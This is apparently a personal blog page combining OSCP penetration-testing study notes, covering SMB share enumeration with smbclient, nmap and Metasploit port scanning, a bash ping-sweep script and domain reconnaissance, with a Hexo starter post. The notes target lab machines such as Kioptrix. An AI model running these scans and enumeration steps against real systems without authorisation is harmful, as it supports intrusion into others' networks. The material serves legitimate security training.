Resolve the host name

NetBIOS over TCP/IP (NBT, or sometimes NetBT) is a networking protocol that allows legacy computer applications relying on the NetBIOS API to be used on modern TCP/IP networks.

On Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. This will use, as you point out, port 445.

Generally speaking, on other systems, you’ll find services and applications using port 139. This, basically speaking, means that SMB is running with NetBIOS over TCP/IP, where, stack-wise, SMB is on top of NetBIOS if you are to imagine it with the OSI model.

SMB does rely on NetBIOS for communication with devices that do not support direct hosting of SMB over TCP/IP.

NetBIOS is completely independent from SMB. It is an API that SMB, and other technologies can use, so NetBIOS has no dependency to SMB.

https://superuser.com/questions/694469/difference-between-netbios-and-smb

smbclient

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
smbclient -L 192.168.0.22
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       IPC Service (Samba Server)
        ADMIN$          IPC       IPC Service (Samba Server)
Reconnecting with SMB1 for workgroup listing.
Server does not support EXTENDED_SECURITY  but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
Anonymous login successful

        Server               Comment
        ---------            -------
        KIOPTRIX             Samba Server

        Workgroup            Master
        ---------            -------
        HIRON                INTEL_CE_LINUX
        MYGROUP              KIOPTRIX

-L, –list=HOST

1
smbclient "\\\192.168.0.22\IPC$"

see Not enough ‘' characters in service, just add more backslashes

Notes

could also try nmap with smb scripts

1
nmap --script "smb-*" 192.168.0.22
OSCP Study Notes - 2021/03/07|OSCP-Study Notes-Penetration Testing

TRY HARDER!!

Table of Contents:

Metasploit Setup

Requirements: METASPLOIT UNLEASHED REQUIREMENTS

Hypervisor Setup

Direct Control back to host: Alt+Ctl

Kali Linux

  • RAM: 2GB
  • Disk 10GB
  • Username: gavin
  • PasswordTip: [cc6]
  • Update Metasploit: apt update && apt upgrade

MetaSploitable:

  • RAM: 512MB
  • login: msfadmin:msfadmin

Metasploit Filesystem and Libraries

Link: METASPLOIT FILESYSTEM AND LIBRARIES
Installed in Kali Linux by default
pacakge path: /usr/share/metasploit-framework
DATA/DOCUMENTATION/LIB/MODULES/PLUBINS/SCRIPTS/TOOLS

Two Module Locations:

  • Primary Modules: /usr/share/metasploit-framework/modules/
  • Custom Modules: ~/.msf4/modules/

Modules

  • Exploits: exploit modules are defined as modules that use payloads
  • Auxiliary: Auxiliary modules include port scanners, fuzzers, sniffers, and more.
  • Payloads, Encoders, Nops: Payloads consist of code that runs remotely, while encoders ensure that payloads make it to their destination intact. Nops keep the payload sizes consistent across exploit attempts.

Metasploit Fundamentals

Payload Type

Singles

Singles are payloads that are self-contained and completely standalone. A Single payload can be something as simple as adding a user to the target system or running calc.exe

Stagers

Stagers setup a network connection between the attacker and victim and are designed to be small and reliable. It is difficult to always do both of these well so the result is multiple similar stagers. Metasploit will use the best one when it can and fall back to a less-preferred one when necessary.

Stages

Stages are payload components that are downloaded by Stagers modules. The various payload stages provide advanced features with no size limits such as Meterpreter, VNC Injection, and the iPhone ‘ipwn’ Shell.

CommandLine Refresher

pwd, man, ls, cd, mkdir, rmdir, cp, mv, locate(find file), adduser, su, sudo, echo, cat, nano, chmod, ifconfig, ping

adduser bob sudo create bob as sudo user

Kali Services:

http, ssh, postgresql

http

service apache2 start
systemctl enable apache2
service apache2 stop

netstat

netstat -antp
-a, –all display all sockets (default: connected)
-n, –numeric don’t resolve names
-t –tcp
-p, –programs display PID/Program name for sockets (permission relatied)

postgresql

enable postgresql will make msfconsole search more quickly (can not feel it)

Bash Scripting

ping -c 1 192.168.119.2 | grep "64 bytes" | cut -d " " -f 4 | sed 's/.$//'
-d, –delimiter=DELIM use DELIM instead of TAB for field delimiter
-f, –fields=LIST select only these fields; also print any line that contains no delimiter character, unless the -s option is specified

sed 's/.$//'
The “.” (dot) indicates any character in sed, and the “$” indicates the end of the line. In other words “.$” means, delete the last character only.

ping all responed IP in the network: 

1
2
3
4
5
6
7
8
9
10
11
#!/bin/bash
if [ "$1" == "" ] # space after [
then
	echo "Usage: ./ping_script.sh [network]"
	echo "Example: ./ping_script.sh 192.168.119"
else
	for ip in `seq 1 254`; do 
		ping -c 1 $1.$ip | grep "64 bytes" \
		| cut -d " " -f 4 | sed 's/.$//' &
	done
fi
1
2
./pingsweep.sh > iplist.txt
cat iplist.txt | sort -u

-u show only unique results

1
for ip in $(cat iplist.txt); do nmap -Pn $ip; done

nmap:
-Pn: Treat all hosts as online – skip host discovery

Information Gathering

Tools:

Google, Exploit-DB, Google Hacking DB, WHOIS, Netcraft, theharvester

Google

site:cnn.com -site:www.cnn.com filetype:pdf
showdan devices connect to internet

Netcraft

Search web by domain https://searchdns.netcraft.com/ *.cnn.com

Whois

looking for domain information whois cnn.com

theHarvester

theHarvester -d cnn.com -b google -l 200
-d domain
-b datasource (e.g. bing, linkedin, google)
-l limit the number of results

nc -nv xxx.xxx.xxx.xxx <port>
-n numeric-only IP addresses, no DNS
-v verbose [use twice to be more verbose]

Scanning with nmap

pingsweep, but not quite accurate, false postive

1
2
nmap -sn 192.168.119.1-254
nmap -sn 192.168.119.0/24

-sn: Ping Scan - disable port scan

1
nmap -vv -Pn -A -sS -T4 -p- -oN tcpscan.txt 192.168.119.129

-A: Enable OS detection, version detection, script scanning, and traceroute
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
use sS to avoid triggering fireware, SEND, ACK, instead of ACK back, send RST(reset))
-T<0-5>: Set timing template (higher is faster) may be get detected when set high, in real world, T4 seems fine
-p <port ranges>: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
-p- (all)
-oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIptkIddi3,and Grepable format, respectively, to the given filename.

Speedup tips: quickly scan for open ports, then do -A on open ports to gather more info

UDP scan

1
nmap -vv -Pn -A -sU -T4 --top-ports 200 -oN udpscan.txt 192.168.119.129

–top-ports <number>: Scan <number> most common ports

Again, two stage scans, very useful, save time

nmap script engining

script stored at /usr/share/nmap/scrips

1
nmap -vv -p 137 --script=all 192.168.119.129

Scan with Metasploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
msfconsole
search portscan

## enter module:
use auxiliary/scanner/portscan/syn

show options
## change options, case insensitive
set ports 1-65535
set rhost 192.169.119.129
set threads 10

## run it
exploit

Kioptrix: Level 1

Download: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Walk Through

Kioptrix Level 1 Walkthrough
Hello World

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

Quick Start

Create a new post

1
$ hexo new "My New Post"

More info: Writing

Run server

1
$ hexo server

More info: Server

Generate static files

1
$ hexo generate

More info: Generating

Deploy to remote sites

1
$ hexo deploy

More info: Deployment

Clone Notes:

Source Code Branch: source
Deploy Branch: Master 

1
2
3
git clone -b source git@github.com:Gavincrz/gavincrz.github.io.git
cd gavincrz.github.io
npm install